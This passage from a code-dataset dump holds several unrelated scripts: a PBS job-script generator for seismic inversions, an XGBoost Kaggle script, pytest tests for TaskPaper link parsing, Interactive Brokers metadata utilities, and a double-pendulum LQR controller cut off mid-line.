\"ARRAYID=`echo $ARRAY| cut -d' ' -f4`\\n\"\n msg += 'ARRAY=$ARRAYID\\n'\n name = '%s_new_d${damp}_it${iterno}' % setup.pbsjob\n msg += 'NEW=' + new % (name, var)\n msg += \"NEWID=`echo $NEW | cut -d' ' -f4`\\n\"\n msg += 'OLD=$NEWID\\n'\n msg += 'done\\n'\n msg += 'done\\n'\n\n elif setup.intype == 'FSI' and setup.rundir.startswith('/home'):\n msg = '#!/bin/bash\\n'\n msg += 'mkdir log\\n'\n msg += 'st_it=%s\\n' % setup.iterations[0]\n msg += 'ed_it=%s\\n' % setup.iterations[1]\n msg += 'ed_it=$(($ed_it+1))\\n'\n msg += 'count=1\\n'\n\n var = 'damp=${damp},iterno=${iterno},ed_it=${ed_it}'\n\n modes = ''\n for segname, sdir in setup.segmentsdir.items():\n if sdir.startswith('//nfs'):\n sdir = sdir.replace('//nfs/stig/', '/home/')\n modes = modes + \"%s \" % (sdir)\n\n msg += dorun_preprundir(setup)\n\n msg += '\\n'\n msg += '#----------------#\\n'\n msg += '# DAMPING LOOP #\\n'\n msg += '#----------------#\\n'\n msg += 'for damp in %s\\n' % get_damping_string(setup)\n msg += 'do\\n'\n msg += 'i=0\\n'\n msg += 'for mdir in %s\\n' % (modes)\n msg += 'do\\n'\n msg += 'i=$(($i+1))\\n'\n name = '%s_startup_d${damp}_i${i}' % setup.pbsjob\n msg += 'if [[ count -eq 1 ]]; then\\n'\n msg += 'START=$(qsub -d $mdir -N %s -v damp=${damp} ' % name\n msg += 'qsub_startup.pbs)\\n'\n msg += 'else\\n'\n msg += 'START=$(qsub -d $mdir -N %s -v damp=${damp} ' % name\n msg += '-W depend=afterok:$OLD qsub_startup.pbs)\\n'\n msg += 'fi\\n'\n msg += 'done\\n'\n msg += '((count++))\\n'\n msg += 'OLD=$START\\n'\n msg += 'while qstat -u jagt | grep -e \"*startup_d*_i*\" &> /dev/null\\n'\n msg += 'do\\n'\n msg += 'sleep 10\\n'\n msg += 'done\\n'\n msg += '\\n'\n msg += '#------------------------#\\n'\n msg += '# ITERATION LOOP START #\\n'\n msg += '#------------------------#\\n'\n msg += 'for (( iterno=$st_it; iterno<=$ed_it; iterno++ ))\\n'\n msg += 'do\\n'\n name = '%s_array_d${damp}_it${iterno}' % setup.pbsjob\n msg += 'ARRAY=$(qsub -N %s -v %s ' % (name, var)\n msg += '-W depend=afterok:$OLD qsub_array.pbs)\\n'\n msg += '\\n'\n\n name = '%s_new_d${damp}_it${iterno}' % setup.pbsjob\n msg += 'NEW=$(qsub -N %s -v %s ' % (name, var)\n msg += '-W depend=afterokarray:$ARRAY qsub_new.pbs)\\n'\n msg += 'OLD=$NEW\\n'\n msg += 'done\\n'\n msg += 'done\\n'\n\n if uncertainties is True:\n file_name = 'submit_uncertainties.sh'\n else:\n file_name = 'submit_dependencies.sh'\n\n file_path = join(setup.rundir, file_name)\n with open(file_path, 'w+') as fh:\n fh.write(msg)\n return\n\n\ndef pbsrundir_sanity_check(rundir):\n pbsrundir = rundir\n\n if pbsrundir.startswith('//nfs'):\n pbsrundir = pbsrundir.replace('//nfs/stig/', '/home/')\n #\n # if len(pbsrundir) > 45:\n # pbsrundir = '\"%s\"\\\\\\n\"%s\"' % (pbsrundir[0:46], pbsrundir[46:])\n return pbsrundir\n\n\ndef write_segment_files(mode, path=None, verbose=False):\n if path is None:\n path = '/quanta1/home/simons/splitting/modes/'\n path += mode\n\n comps = ['R', 'T', 'Z']\n\n for c in comps:\n if c == 'Z':\n seg = read_seg('db', channel=c, modes=format_name(mode).upper(),\n min_snr=2)\n else:\n seg = read_seg('db', channel=c, modes=format_name(mode).upper(),\n min_snr=1.5)\n\n if verbose:\n print(seg)\n os.chdir(os.path.join(path, \"segments_%s\" % c))\n seg.write('', eventfiles=True, overwrite=True, format='segment')\n\n return\n\n\ndef uncertainties_dir(setup, remove_existing=False, boot_strap=False,\n jack_knive=True, size_of_subsets='full',\n N_of_subsets=200, allevents_subset_ratio=None,\n verbose=False):\n \"\"\"\n Creates the uncertainties directory specifed for setup.rundir\n \"\"\"\n if exists(join(setup.rundir, 'uncertainties')):\n if remove_existing is True:\n shutil.rmtree(join(setup.rundir, 'uncertainties'))\n else:\n raise IOError('uncertainties directory exists!')\n os.makedirs(join(setup.rundir, 'uncertainties'))\n\n src = join(setup.nmpydir, mergepath)\n dst = join(setup.rundir, \"merge.py\")\n shutil.copy(src, dst)\n\n with open(join(setup.rundir, 'allevents'), 'r') as fh:\n allevents = fh.readlines()\n\n file_subset_list = join(setup.rundir, 'uncertainties', 'subsets')\n subset_list = []\n\n N = len(allevents)\n if verbose:\n msg = '%s events read' % N\n print(msg)\n\n subsets = []\n wo_cmt = []\n cmt_list = ['031111B', '122604A', '022710A', '032805D', '062301E','060994A',\n '100494B', '081918A', '052413A', '031111Q', '122604Q','022710Q',\n '032805Q', '062301Q', '060994Q', '100494Q', '052413Q']\n\t\t # '092503C', '081977B', '111506F', not needed\n\n if boot_strap is True:\n if size_of_subsets == 'full':\n size_of_subsets = N\n\n if size_of_subsets > N:\n size_of_subsets = N\n\n # Nrange = int(round(N/10.))\n N_cmt = 0\n\n for cmt in cmt_list:\n w_cmt = [x for x in allevents if cmt in x]\n if len(w_cmt) == 0:\n continue\n wo_cmt = set(allevents) - set(w_cmt)\n c = list(wo_cmt)\n c = [[item.rstrip() + ' ' + str(c.count(item))][0] for item in c]\n subsets += [c]\n N_cmt += 1\n\n for i in range(N_of_subsets-N_cmt):\n try:\n c = np.random.choice(wo_cmt, size=size_of_subsets,\n replace=False).tolist()\n except ValueError:\n if verbose is True:\n print('size larger than allevents, replace set to True')\n c = np.random.choice(allevents, size=size_of_subsets,\n replace=True).tolist()\n c = [[item.rstrip() + ' ' + str(c.count(item))][0] for item in c]\n c = list(set(c))\n subsets += [c]\n\n elif jack_knive is True:\n # jack_knive should only remove one event at a time, nothing fancy\n allevents = [e.rstrip() for e in allevents] # removving linebreak\n N_all = len(allevents)\n subsets = []\n\n if N_all < 20:\n for i, item in enumerate(allevents):\n subsets += [allevents[0:i] + allevents[i+1:]]\n else:\n # This loop removes creates subsets with one event only removed,\n # chosen from cmt_list\n for cmt in cmt_list:\n w_cmt = [x for x in allevents if cmt in x]\n wo_cmt = set(allevents) - set(w_cmt)\n subsets += [list(wo_cmt)]\n if verbose:\n msg = '%s fixed subsets created' % len(subsets)\n print(msg)\n\n if N_of_subsets > N_all:\n N = N_all\n else:\n N = N_of_subsets\n\n if allevents_subset_ratio is not None:\n size = int(allevents_subset_ratio * N_all)\n else:\n if size_of_subsets > N_all:\n size = N_all - 1\n else:\n size = size_of_subsets\n\n delta = int(abs(len(allevents) - size))\n if verbose:\n print('delta : %i' % delta)\n i = 0\n while(True):\n if i+delta > len(allevents):\n break\n c = list(set(allevents) - set(allevents[i:i+delta]))\n subsets += [c]\n i= i + delta\n if verbose:\n msg = '%s subsets created in total' % len(subsets)\n print(msg)\n\n for i, subset in enumerate(subsets):\n fname = join(setup.rundir, 'uncertainties', \"allevents_%s\" % (i+1))\n # if verbose:\n # print('subsets: %s' % fname)\n with open(fname, 'w') as fh:\n for line in subset:\n fh.write(\"%s\\n\" % line)\n with open(file_subset_list, 'a') as fh:\n subset_list += [fname]\n fh.write(\"%s\\n\" % fname)\n\n setup.uncertainties['files'] = subset_list\n\n return setup\n\n\ndef uncertainties_script(setup, damping):\n \"\"\"\n creates:\n submission script:\n PATH/submit_uncertainties.sh\n\n new allevents files, containing the subsets:\n PATH/uncertainties/allevents_1-*\n\n List of the paths to these files:\n PATH/uncertainties/subsets\n\n modified sbatch_new.sh script:\n PATH/uncertainties/sbatch_new.sh\n\n \"\"\"\n setup.damping = damping\n setup.uncertainties['damping'] = damping\n dependencies_script(setup, uncertainties=True)\n new_script(setup, uncertainties=True)\n array_script(setup, uncertainties=True)\n\n return setup\n","sub_path":"frospy/core/setup/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":85179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"243592696","text":"# coding: utf-8\n__author__ = 'ZFTurbo: https://kaggle.com/zfturbo'\n\n# Changes:\n# Refactored to using DataLoader and Predictor classes\n\n# TODO\n# Want to improve score -- 0.83 -- and considering any of\n# - tweak xgboost\n# - add alternative algorithm\n# - use more/different features\n\n\nimport datetime\nimport pandas as pd\nimport numpy as np\nfrom sklearn.cross_validation import train_test_split\nimport xgboost as xgb\nfrom operator import itemgetter\nfrom sklearn.metrics import roc_auc_score\nimport time\n\n\nclass XGBooster:\n fmap_fname = 'xgb.fmap'\n\n def _create_feature_map(self, features):\n with open(self.fmap_fname, 'w') as outfile:\n for i, feat in enumerate(features):\n outfile.write('{0}\\t{1}\\tq\\n'.format(i, feat))\n\n def _get_importance(self, gbm, features):\n self._create_feature_map(features)\n importance = gbm.get_fscore(fmap=self.fmap_fname)\n importance = sorted(\n importance.items(), key=itemgetter(1), reverse=True\n )\n return importance\n\n def run_test(self, train, test, features, target, random_state=0):\n eta = 0.1\n max_depth = 5\n subsample = 0.8\n colsample_bytree = 0.8\n start_time = time.time()\n\n print('XGBoost params. ETA: {}, MAX_DEPTH: {}, SUBSAMPLE: {}, \\\n COLSAMPLE_BY_TREE: {}'.format(\n eta, max_depth, subsample, colsample_bytree)\n )\n params = {\n \"objective\": \"binary:logistic\",\n \"booster\": \"gbtree\",\n \"eval_metric\": \"auc\",\n \"eta\": eta,\n \"max_depth\": max_depth,\n \"subsample\": subsample,\n \"colsample_bytree\": colsample_bytree,\n \"silent\": 1,\n \"seed\": random_state\n }\n num_boost_round = 260\n early_stopping_rounds = 20\n test_size = 0.1\n\n X_train, X_valid = train_test_split(\n train, test_size=test_size, random_state=random_state\n )\n y_train = X_train[target]\n y_valid = X_valid[target]\n dtrain = xgb.DMatrix(X_train[features], y_train)\n dvalid = xgb.DMatrix(X_valid[features], y_valid)\n\n watchlist = [(dtrain, 'train'), (dvalid, 'eval')]\n gbm = xgb.train(params, dtrain, num_boost_round, evals=watchlist,\n early_stopping_rounds=early_stopping_rounds,\n verbose_eval=True)\n\n print(\"Validating...\")\n check = gbm.predict(\n xgb.DMatrix(X_valid[features]), ntree_limit=gbm.best_ntree_limit\n )\n score = roc_auc_score(X_valid[target].values, check)\n print('Check error value: {:.6f}'.format(score))\n\n imp = self._get_importance(gbm, features)\n print('Importance array: ', imp)\n\n print(\"Predict test set...\")\n test_prediction = gbm.predict(\n xgb.DMatrix(test[features]), ntree_limit=gbm.best_ntree_limit\n )\n took_time = round((time.time() - start_time)/60, 2)\n print('Training time: {} minutes'.format(took_time))\n return test_prediction.tolist(), score\n\n\ndef create_submission(score, test, prediction):\n now = datetime.datetime.now()\n now_str = str(now.strftime(\"%Y-%m-%d-%H-%M\"))\n sub_file = 'submission_' + str(score) + '_' + now_str + '.csv'\n print('Writing submission: ', sub_file)\n with open(sub_file, 'w') as f:\n f.write('id,probability\\n')\n total = 0\n for id in test['id']:\n str1 = str(id) + ',' + str(prediction[total])\n str1 += '\\n'\n total += 1\n f.write(str1)\n\n\ndef intersect(a, b):\n return list(set(a) & set(b))\n\n\ndef get_features(train, test):\n trainval = list(train.columns.values)\n testval = list(test.columns.values)\n output = intersect(trainval, testval)\n output.remove('itemID_1')\n output.remove('itemID_2')\n return output\n\n\nclass DataLoader:\n def __init__(self, data_dir, item_pairs_fname, item_info_fname,\n location_fname, category_fname):\n self.data_dir = data_dir\n self.item_pairs_fname = data_dir + item_pairs_fname\n self.item_info_fname = data_dir + item_info_fname\n self.location_fname = data_dir + location_fname\n self.category_fname = data_dir + category_fname\n\n def _load_data_with(self, types1, types2):\n print(\"Load \"+self.item_pairs_fname)\n pairs = pd.read_csv(self.item_pairs_fname, dtype=types1)\n print(\"Load \"+self.item_info_fname)\n items = pd.read_csv(self.item_info_fname, dtype=types2)\n items.fillna(-1, inplace=True)\n location = pd.read_csv(self.location_fname)\n category = pd.read_csv(self.category_fname)\n return pairs, items, location, category\n\n def _add_text_features(self, items):\n print('Add text features...')\n items['len_title'] = items['title'].str.len()\n items['len_description'] = items['description'].str.len()\n items['len_attrsJSON'] = items['attrsJSON'].str.len()\n return items\n\n def _merge_items(self, train, items, category, location):\n for i in ['1', '2']:\n print('Merge item {}...'.format(i))\n item = items[\n ['itemID', 'categoryID', 'price', 'locationID', 'metroID',\n 'lat', 'lon', 'len_title', 'len_description', 'len_attrsJSON']\n ]\n item = pd.merge(\n item, category, how='left', on='categoryID', left_index=True\n )\n item = pd.merge(\n item, location, how='left', on='locationID', left_index=True\n )\n item = item.rename(\n columns={\n 'itemID': 'itemID_' + i,\n 'categoryID': 'categoryID_' + i,\n 'parentCategoryID': 'parentCategoryID_' + i,\n 'price': 'price_' + i,\n 'locationID': 'locationID_' + i,\n 'regionID': 'regionID_' + i,\n 'metroID': 'metroID_' + i,\n 'lat': 'lat_' + i,\n 'lon': 'lon_' + i,\n 'len_title': 'len_title_' + i,\n 'len_description': 'len_description_' + i,\n 'len_attrsJSON': 'len_attrsJSON_' + i,\n }\n )\n train = pd.merge(\n train, item, how='left', on='itemID_'+i, left_index=True\n )\n return train\n\n def _create_same_arrays(self, train):\n print('Create same arrays')\n train['price_same'] = np.equal(\n train['price_1'], train['price_2']).astype(np.int32)\n train['locationID_same'] = np.equal(\n train['locationID_1'], train['locationID_2']).astype(np.int32)\n train['categoryID_same'] = np.equal(\n train['categoryID_1'], train['categoryID_2']).astype(np.int32)\n train['regionID_same'] = np.equal(\n train['regionID_1'], train['regionID_2']).astype(np.int32)\n train['metroID_same'] = np.equal(\n train['metroID_1'], train['metroID_2']).astype(np.int32)\n train['lat_same'] = np.equal(\n train['lat_1'], train['lat_2']).astype(np.int32)\n train['lon_same'] = np.equal(\n train['lon_1'], train['lon_2']).astype(np.int32)\n return train\n\n def _prep_data(self, pairs, items, category, location):\n items = self._add_text_features(items)\n data = self._merge_items(pairs, items, category, location)\n data = self._create_same_arrays(data)\n return data\n\n def get_types_2(self):\n return {\n 'itemID': np.dtype(int),\n 'categoryID': np.dtype(int),\n 'title': np.dtype(str),\n 'description': np.dtype(str),\n 'images_array': np.dtype(str),\n 'attrsJSON': np.dtype(str),\n 'price': np.dtype(float),\n 'locationID': np.dtype(int),\n 'metroID': np.dtype(float),\n 'lat': np.dtype(float),\n 'lon': np.dtype(float),\n }\n\n def _get_data_types(self):\n return self.get_types_1(), self.get_types_2()\n\n def get_types_1(self):\n raise NotImplementedError(\"Subclasses should implement this.\")\n\n def prepare(self):\n raise NotImplementedError(\"Subclasses should implement this.\")\n\n\nclass TrainDataLoader(DataLoader):\n def get_types_1(self):\n return {\n 'itemID_1': np.dtype(int),\n 'itemID_2': np.dtype(int),\n 'isDuplicate': np.dtype(int),\n 'generationMethod': np.dtype(int),\n }\n\n def prepare(self):\n start_time = time.time()\n types1, types2 = self._get_data_types()\n pairs, items, location, category = self._load_data_with(types1, types2)\n train = self._prep_data(pairs, items, category, location)\n train = train.drop(['generationMethod'], axis=1)\n print('Create train data time: {} seconds'.format(\n round(time.time() - start_time, 2))\n )\n train.fillna(-1, inplace=True)\n return train\n\n\nclass TestDataLoader(DataLoader):\n def get_types_1(self):\n return {\n 'itemID_1': np.dtype(int),\n 'itemID_2': np.dtype(int),\n 'id': np.dtype(int),\n }\n\n def prepare(self):\n start_time = time.time()\n types1, types2 = self._get_data_types()\n pairs, items, location, category = self._load_data_with(types1, types2)\n test = self._prep_data(pairs, items, category, location)\n print('Create test data time: {} seconds'.format(\n round(time.time() - start_time, 2))\n )\n test.fillna(-1, inplace=True)\n return test\n\n\ndef read_test_train():\n data_dir = \"../input/\"\n train_item_pairs_fname = 'ItemPairs_train.csv'\n train_item_info_fname = 'ItemInfo_train.csv'\n test_item_pairs_fname = 'ItemPairs_test.csv'\n test_item_info_fname = 'ItemInfo_test.csv'\n location_fname = 'Location.csv'\n category_fname = 'Category.csv'\n train = TrainDataLoader(\n data_dir, train_item_pairs_fname, train_item_info_fname,\n location_fname, category_fname\n ).prepare()\n test = TestDataLoader(\n data_dir, test_item_pairs_fname, test_item_info_fname,\n location_fname, category_fname\n ).prepare()\n # Get only subset of data\n len_old = len(train.index)\n train = train.sample(frac=0.5)\n len_new = len(train.index)\n print('Reduce train from {} to {}'.format(len_old, len_new))\n features = get_features(train, test)\n return train, test, features\n\n\nclass Predictor:\n def __init__(self, algorithm, train, test, features, target_field):\n self.algorithm = algorithm\n self.train = train\n self.test = test\n self.features = features\n self.target_field = target_field\n\n def predict(self):\n if self.algorithm == 'xgboost':\n return XGBooster().run_test(\n self.train, self.test, self.features, self.target_field\n )\n # Plug in alternative algs\n raise NotImplementedError(\"Unknown algorithm.\")\n\n\nif __name__ == '__main__':\n train, test, features = read_test_train()\n print('Length of train: ', len(train))\n print('Length of test: ', len(test))\n print('Features [{}]: {}'.format(len(features), sorted(features)))\n test_prediction, score = Predictor(\n 'xgboost', train, test, features, 'isDuplicate'\n ).predict()\n print('Real score = {}'.format(score))\n create_submission(score, test, test_prediction)\n","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":11517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"549917550","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\"\"\"\nThis file contains some methods for testing the way we handle links.\nCompared to tags, this code is fairly simple.\n\"\"\"\n\nimport pytest\n\nfrom taskpaper import TaskPaperItem\n\n\n@pytest.mark.parametrize('item_text,links', [\n # Example with no tags\n ['lorem ipsum', []],\n\n # Example with an email address at the end of the item\n ['hello example@example.org', ['example@example.org']],\n\n # Example with a web address at the end of the item\n ['foo http://google.co.uk', ['http://google.co.uk']],\n\n # Example with a web address in the middle of the item\n ['quick ftp://brownfox.com jumps', ['ftp://brownfox.com']],\n\n # Example with a local file path\n ['opening ./myfile.txt', ['./myfile.txt']],\n\n # Example with a web address and an email address\n ['send http://book.org to library@example.net', ['http://book.org', 'library@example.net']]\n])\ndef test_link_parsing(item_text, links):\n \"\"\"\n Create some items which contain links, and check the links are\n recognised correctly.\n \"\"\"\n item = TaskPaperItem(item_text)\n assert item.links == links\n\n\n@pytest.mark.parametrize('bad_link', [\n 'notalink',\n 'http//missingcolon.com',\n 'example-at-example-dot-org',\n 'http://example.org and some text'\n])\ndef test_adding_bad_links_is_rejected(bad_link):\n \"\"\"\n Trying to add something that isn't a link to the list of links is an\n error.\n \"\"\"\n item = TaskPaperItem('An item without any links')\n with pytest.raises(ValueError):\n item.links.append(bad_link)\n\n\n@pytest.mark.parametrize('good_link', [\n 'http://google.co.uk',\n 'ftp://sekrit.org',\n 'john@smith.com',\n])\ndef test_link_mutation(good_link):\n \"\"\"\n Add a link to an item, check it's allowed, check it shows up correctly.\n \"\"\"\n item = TaskPaperItem('Another item without any links')\n\n item.links.append(good_link)\n assert len(item.links) == 1\n assert item.links == [good_link]\n\n\n# def test_tag_mutation():\n# \"\"\"\n# Create an item, add some tags, remove some tags, check that the correct\n# state is preserved throughout.\n# \"\"\"\n# item = TaskPaperItem('I am a test')\n#\n# # Start by adding a series of tags\n# item.add_tag('hello')\n# item.add_tag(name='foo', value='bar')\n# item.add_tag(name='company', value='hogbay software')\n# item.add_tag(name='foo', value='baz')\n# print(item.tags)\n# assert item.tags == [\n# ('hello', ''),\n# ('foo', 'bar'),\n# ('company', 'hogbay software'),\n# ('foo', 'baz'),\n# ]\n#\n# # Remove a tag by name only. Check that all tags with this name are\n# # removed.\n# item.remove_tag(name='foo')\n# assert item.tags == [\n# ('hello', ''),\n# ('company', 'hogbay software'),\n# ]\n#\n# # Remove a tag, specifying both the name and value. Make sure that\n# # only this tag is removed.\n# item.add_tag(name='company', value='apple inc')\n# item.remove_tag(name='company', value='hogbay software')\n# assert item.tags == [\n# ('hello', ''),\n# ('company', 'apple inc'),\n# ]\n#\n# # Using the set_tag method correctly updates the value of an\n# # existing tag\n# item.set_tag(name='hello', value='new_value')\n# assert item.tags == [\n# ('hello', 'new_value'),\n# ('company', 'apple inc'),\n# ]\n#\n# # Using the set_tag method will create a new tag if the name doesn't\n# # already exist\n# item.set_tag(name='blue', value='aquamarine')\n# assert item.tags == [\n# ('hello', 'new_value'),\n# ('company', 'apple inc'),\n# ('blue', 'aquamarine'),\n# ]\n#\n# def test_tag_inclusion():\n# \"\"\"\n# Create some tags, check they are correctly recognised as being part\n# of the tag list.\n# \"\"\"\n# item = TaskPaperItem('I am a test @hello(world) @foo(bar) @baz')\n#\n# # Check that if we only specify the name of the tag, we get the\n# # correct result.\n# for tag_name in ['hello', 'foo', 'baz']:\n# assert tag_name in item.tags\n# assert 'lorem' not in item.tags\n#\n# # Check that if we specify a name and a value, we get the same\n# # result.\n# assert ('hello', 'world') in item.tags\n# assert ('foo', 'bar') in item.tags\n# assert ('lorem', 'ipsum') not in item.tags\n#\n# # Check that nonsense objects are not in the list of tags\n# assert 47 not in item.tags\n# assert float('inf') not in item.tags\n# assert TaskPaperItem('tomato soup') not in item.tags\n#\n#\n# def test_matching_tag_at_end_of_item_string():\n# \"\"\"\n# Test that a tag at the end of an item is found correctly.\n# \"\"\"\n# item = TaskPaperItem('Tag is right at the end @hello')\n# assert item.tags == [('hello', '')]\n#\n# item2 = TaskPaperItem('Another item right at the end @hello(world)')\n# assert item2.tags == [('hello', 'world')]\n#\n#\n# def test_matching_tag_at_start_of_item_string():\n# \"\"\"\n# Test that a tag at the start of an item is found correctly.\n# \"\"\"\n# item = TaskPaperItem('@hello Tag is at the very start')\n# assert item.tags == [('hello', '')]\n#\n# item2 = TaskPaperItem('@hello(world) Another tag right at the start')\n# assert item2.tags == [('hello', 'world')]\n#\n#\n# @pytest.mark.parametrize('bad_tag_name', [\n# 47,\n# float('inf'),\n# TaskPaperItem('tomato soup'),\n# ])\n# def test_adding_bad_tag_names_is_rejected(bad_tag_name):\n# \"\"\"\n# If we try to add a bad tag name to an item, we get a ValueError.\n# \"\"\"\n# item = TaskPaperItem('I am a test @hello(world) @foo(bar) @baz')\n# with pytest.raises(ValueError):\n# item.add_tag(bad_tag_name)\n#\n#\n# @pytest.mark.parametrize('bad_bool', [\n# 42,\n# float('nan'),\n# 'cabbage',\n# 'strawberry custard',\n# 1 + 2j,\n# ])\n# def test_setting_done_to_non_bool_is_error(bad_bool):\n# \"\"\"\n# Trying to set the done status of an item to anything but True/False\n# is an error.\n# \"\"\"\n# item = TaskPaperItem('I am an unfinished item.')\n# with pytest.raises(ValueError):\n# item.done = bad_bool\n#\n#\n# @given(taglist_strategy())\n# def test_creating_two_items_with_the_same_tags_gives_equal_tag_lists(taglist):\n# \"\"\"\n# Two items given the same tags have equal tag lists.\n# \"\"\"\n# item1 = TaskPaperItem('I am a test')\n# item2 = TaskPaperItem('A different test')\n#\n# for t in taglist:\n# item1.add_tag(*t)\n# item2.add_tag(*t)\n#\n# assert item1.tags == item2.tags\n#\n#\n# @pytest.mark.parametrize('bad_item_string', [\n# 'hello world @tag)',\n# 'hello world @tag())',\n# 'hello world @tag(value)a',\n# ])\n# def test_tag_followed_by_nonsense_char_is_ignored(bad_item_string):\n# \"\"\"\n# A tag value followed by spurious parens isn't matched. These examples\n# are obtained by experimenting with TaskPaper to see what it matches\n# as a tag.\n# \"\"\"\n# item = TaskPaperItem(bad_item_string)\n# assert item.tags == []\n#\n#\n# # TOOD: Swap this out for suppress_health_checks.\n# @settings(perform_health_check=False)\n# @given(taglist_strategy())\n# def test_shuffling_tag_list_doesnt_affect_equality(taglist):\n# \"\"\"\n# Tag lists are equal, modulo shuffling.\n# \"\"\"\n# item1 = TaskPaperItem('I am a new test')\n# item2 = TaskPaperItem('Another different test')\n#\n# for t in taglist:\n# item1.add_tag(*t)\n# item2.add_tag(*t)\n#\n# # Shuffle the tags on item1, and check the tag lists remain equal.\n# random.shuffle(item1.tags)\n# assert item1.tags == item2.tags\n#\n#\n# @given(taglist_strategy(), taglist_strategy())\n# def test_different_taglists_of_different_lengths_are_unequal(list1, list2):\n# \"\"\"\n# If two lists of tags have different length, they are never equal.\n# \"\"\"\n# assume(len(list1) != len(list2))\n# item1 = TaskPaperItem('I am a new test')\n# item2 = TaskPaperItem('Another different test')\n#\n# for t in list1:\n# item1.add_tag(*t)\n# for t in list2:\n# item2.add_tag(*t)\n#\n# assert item1.tags != item2.tags\n#\n#\n# @given(taglist_strategy())\n# def test_round_trip_of_tag_items(taglist):\n# \"\"\"\n# Casting an item with some tags to a string and back gets the same tags.\n# \"\"\"\n# item = TaskPaperItem(\"I have no tags\")\n# assert item.tags == []\n#\n# for t in taglist:\n# item.add_tag(*t)\n#\n# item_str = str(item)\n# new_item = TaskPaperItem(item_str)\n#\n# assert new_item.tags == taglist\n","sub_path":"tests/_test_links.py","file_name":"_test_links.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"57023980","text":"from typing import Optional, Union, List\nfrom pathlib import Path\nfrom os import makedirs, path\n\nimport numpy as np\nfrom ib_insync import IB, ContFuture, MarketOrder, Future\nfrom logbook import Logger\n\nfrom datastore import AbstractBaseStore\n\n\nlog = Logger(__name__)\n\n\ndef update_details(ib: IB, store: AbstractBaseStore,\n keys: Optional[Union[str, List[str]]] = None) -> None:\n \"\"\"\n Pull contract details from ib and update metadata in store.\n\n Args:\n ib: connected IB instance\n store: datastore instance, for which data will be updated\n keys (Optional): keys in datastore, for which data is to be updated,\n if not given, update all keys\n \"\"\"\n if keys is None:\n keys = store.keys()\n elif isinstance(keys, str):\n keys = [keys]\n\n contracts = {}\n for key in keys:\n try:\n contract = eval(store.read_metadata(key)['repr'])\n except TypeError:\n log.error(f'Metadata missing for {key}')\n continue\n contract.update(includeExpired=True)\n contracts[key] = contract\n ib.qualifyContracts(*contracts.values())\n details = {}\n for k, v in contracts.copy().items():\n try:\n details[k] = ib.reqContractDetails(v)[0]\n except IndexError:\n log.error(f'Contract unavailable: {k}')\n del contracts[k]\n\n # get commission levels\n order = MarketOrder('BUY', 1)\n commissions = {}\n for k, v in contracts.items():\n try:\n commissions[k] = ib.whatIfOrder(v, order).commission\n except AttributeError:\n log.error(f'Commission unavailable for: {k}')\n commissions[k] = np.nan\n\n for c, d in details.items():\n _d = {'name': d.longName,\n 'min_tick': d.minTick,\n 'commission': commissions[c]\n }\n store.write_metadata(c, _d)\n\n log.info('Data written to store.')\n\n\ndef default_path(*dirnames: str) -> str:\n \"\"\"\n Return path created by joining ~/ib_data/ and recursively all dirnames\n If the path doesn't exist create it.\n Should also work in Windows but not tested.\n \"\"\"\n home = Path.home()\n dirnames_str = ' / '.join(dirnames)\n if not Path.exists(home / 'ib_data' / dirnames_str):\n makedirs(home.joinpath('ib_data', *dirnames))\n return path.join(str(home), 'ib_data', *dirnames)\n","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"269057219","text":"from numpy import array, zeros, eye, asarray, dot, rad2deg, deg2rad, linspace, sin, cos, pi\nfrom numpy.linalg import inv\nfrom matplotlib.pyplot import plot, xlabel, ylabel, legend, rcParams\nfrom sympy import symbols, simplify, trigsimp\nfrom sympy.physics.mechanics import dynamicsymbols, ReferenceFrame, Point, inertia, RigidBody, KanesMethod\nfrom sympy.physics.vector import init_vprinting, vlatex\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.integrate as integrate\nfrom scipy.integrate import odeint\nfrom scipy.linalg import solve_continuous_are\nfrom pydy.codegen.code import generate_ode_function\nimport pickle\nimport matplotlib.animation as animation\nfrom double_pendulum_setup import theta1, theta2, ankle, leg_length, waist, omega1, omega2, ankle_torque, waist_torque, coordinates, speeds, kane, mass_matrix, forcing_vector, specified, parameter_dict, constants, numerical_constants, numerical_specified\n\n#from utils import controllable\n\ninit_vprinting()\nrcParams['figure.figsize'] = (14.0, 6.0)\n\nright_hand_side = generate_ode_function(mass_matrix, forcing_vector,\n constants,\n coordinates, speeds, specified)\n\n#Initial Conditions for speeds and positions\nx0 = zeros(4)\nx0[0] = deg2rad(2.0)\nx0[1] = deg2rad(-2.0)\n\nargs = {'constants': numerical_constants,\n 'specified': numerical_specified}\n\nframes_per_sec = 60\nfinal_time = 5.0\n\nt = linspace(0.0, final_time, final_time*frames_per_sec)\n\nright_hand_side(x0, 0.0, args)\n\ntorque_vector = []\ntime_vector = []\n\ninputK = open('double_pen_LQR_K_robot.pkl','rb')\ninputa1 = open('double_pen_angle_1_zoom.pkl','rb')\ninputa2 = open('double_pen_angle_2_zoom.pkl','rb')\ninputtor = open('double_pen_equil_torques_zoom.pkl','rb')\n\nK = pickle.load(inputK)\nangle_1 = pickle.load(inputa1)\nangle_1 = np.asarray(angle_1, dtype = float)\nangle_2 = pickle.load(inputa2)\ntorques = pickle.load(inputtor)\n\ninputK.close()\ninputa1.close()\ninputa2.close()\ninputtor.close()\nlasttime = 0.0\nlastk = []\nlasttor = 0.0\nidx_vector = []\nlastidx = 0\ncounter = 0\ntracking_vector = []\ncurr_vector = []\n\ndef stay_controller(x,t):\n global lastidx\n global counter\n torquelim = 200\n if(counter == 0):\n lastidx = np.abs(angle_1 - x[0]).argmin()\n counter = counter + 1\n print(\"first round\")\n print(lastidx)\n if(x[3] < 1 and x[3] > -1):\n# idx = (np.abs(angle_1 - x[0])).argmin()\n# lastidx = idx\n idx = lastidx\n idx_vector.append(lastidx)\n print(idx)\n else:\n idx = (np.abs(angle_1 - x[0])).argmin()\n lastidx = idx\n idx_vector.append(idx)\n print(idx)\n returnval = -dot(K[idx], x)\n if(returnval[1] > torquelim):\n returnval[1] = 